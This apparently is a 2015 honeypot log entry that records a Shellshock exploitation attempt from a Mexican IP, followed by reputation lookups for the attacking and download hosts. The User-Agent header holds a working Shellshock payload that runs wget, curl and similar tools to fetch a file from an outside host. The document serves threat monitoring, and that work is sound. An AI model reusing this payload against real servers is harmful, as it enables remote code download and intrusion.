Sunday, 4 October 2015

187.210.107.242 - wget from 79.99.248.2

BEGIN OF HTTP DATA:
2015-10-04 16:57:03
Source IP: 187.210.107.242
Country: MX RiskScore: 10 Malware:
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 79.99.248.2/TEST231;curl 79.99.248.2/TEST231;fetch 79.99.248.2/TEST231;lwp-download 79.99.248.2/TEST231;GET 79.99.248.2/TEST231");'
Host: 109.234.106.8
Connection: Close


79.99.248[.]2

    Static Source: GeoIP data
  • Country: Georgia
  • ASN: AS44877 Vtel-Georgia
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/79.99.248.2

187.210.107[.]242

    Static Source: GeoIP data
  • Country: Mexico
  • ASN: AS8151 Uninet S.A. de C.V.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/187.210.107.242
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/187.210.107.242
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Dynamic Source: projecthoneypot.org
  • Last seen: 20 day(s) ago
  • Score: 25 (25 = 100 Spam per day, 75 = 1mio Spam per day)
  • Category: Suspicious (1)